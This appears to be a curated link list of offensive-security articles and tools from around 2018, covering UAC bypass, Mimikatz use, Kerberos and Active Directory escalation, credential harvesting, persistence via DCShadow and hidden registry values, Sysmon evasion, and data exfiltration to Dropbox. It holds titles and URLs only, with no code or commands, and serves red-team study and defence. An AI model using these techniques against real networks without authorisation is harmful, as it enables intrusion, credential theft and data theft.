https://littlesecurityprince.com/security/2018/03/18/ModuleMimikatz.html
Multiple Ways to Bypass UAC using Metasploit
From OSINT to Internal: Gaining Domain Admin from Outside the Perimeter
https://www.coalfire.com/The-Coalfire-Blog/Sept-2018/From-OSINT-to-Internal-Gaining-Domain-Admin
Using Mimikatz From a JSP shell
https://blog.securitycompass.com/whiteboard-wednesday-using-mimikatz-from-a-jsp-shell-54f8a21693cc
Poking Around With 2 lsass Protection Options
https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a
Introducing SharpSploit: A C# Post-Exploitation Library
https://posts.specterops.io/introducing-sharpsploit-a-c-post-exploitation-library-5c7be5f16c51
Faster Domain Escalation using LDAP
A Lesson in .NET Framework Versions
https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions
Command and Control Using Active Directory
L1TF (Foreshadow) VM guest to host memory read PoC
https://github.com/gregvish/l1tf-poc
SMB hash hijacking & user tracking in MS Outlook
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smb-hash-hijacking-and-user-tracking-in-ms-outlook
SharpBox is a C# tool for compressing, encrypting, and exfiltrating data to DropBox using the DropBox API
https://github.com/P1CKLES/SharpBox
From Kekeo to Rubeus
https://posts.specterops.io/from-kekeo-to-rubeus-86d2ec501c14
Tokenvator: Release 2
AppLocker CLM Bypass via COM
https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com
Injdrv is a proof-of-concept Windows Driver for injecting DLL into user-mode processes using APC
https://github.com/wbenny/injdrv
Responder and Layer 2 Pivots
https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots
PowerShell: Documenting your environment by running systeminfo on all Domain-Computers
https://sid-500.com/2017/08/09/powershell-documenting-your-environment-by-running-systeminfo-on-all-domain-computers
The power of backup operators
https://decoder.cloud/2018/02/12/the-power-of-backup-operatos
Abusing Windows Library Files for Persistence
https://www.countercept.com/blog/abusing-windows-library-files-for-persistence
Domain Controller Print Server + Unconstrained Kerberos Delegation = Pwned Active Directory Forest
Invoke-Confusion: .NET attacker of PowerShell, remotely
https://homjxi0e.wordpress.com/2018/10/02/invoke-confusion-attack-of-powershell
Creating Persistence with DCShadow
https://blog.stealthbits.com/creating-persistence-with-dcshadow
Time Travel Debugging: finding Windows GDI flaws
Malicious use of Microsoft “Local Administrator Password Solution”
http://archive.hack.lu/2017/HackLU_2017_Malicious_use_LAPS_Clementz_Goichot.pdf
Tokenvator Wiki
https://github.com/0xbadjuju/Tokenvator/wiki
ServiceFu: Harvesting Service Account Credentials Remotely
https://www.securifera.com/blog/2018/10/07/servicefu
Operating Offensively Against Sysmon
https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Exploiting Regedit: Invisible Persistence & Binary Storage
https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf
PoC:
https://github.com/ewhitehats/InvisiblePersistence/tree/master/InvisibleKeys
Attacking Azure Environments with PowerShell
https://youtu.be/IdORwgxDpkw
MicroBurst: A collection of scripts for assessing Microsoft Azure security
https://github.com/NetSPI/MicroBurst
Icebreaker.py: Gaining a foothold in Active Directory in one command
Dan McInerney at SaintCon
https://youtu.be/1LR5u8uKO8I
[Tool] Icebreaker:
Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment
https://github.com/DanMcInerney/icebreaker
Leveraging WSUS – Part One
https://ijustwannared.team/2018/10/15/leveraging-wsus-part-one
Powershell Payload Delivery via DNS using Invoke-PowerCloud
https://how.ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud
SharpAttack: a console for certain tasks on security assessments. It leverages .NET, the Windows API and cobbr_io's SharpSploit to perform its work, and contains commands for domain enumeration, code execution, and other fun things.
https://github.com/jaredhaight/SharpAttack
Living Off the Land
https://liberty-shell.com/sec/2018/10/20/living-off-the-land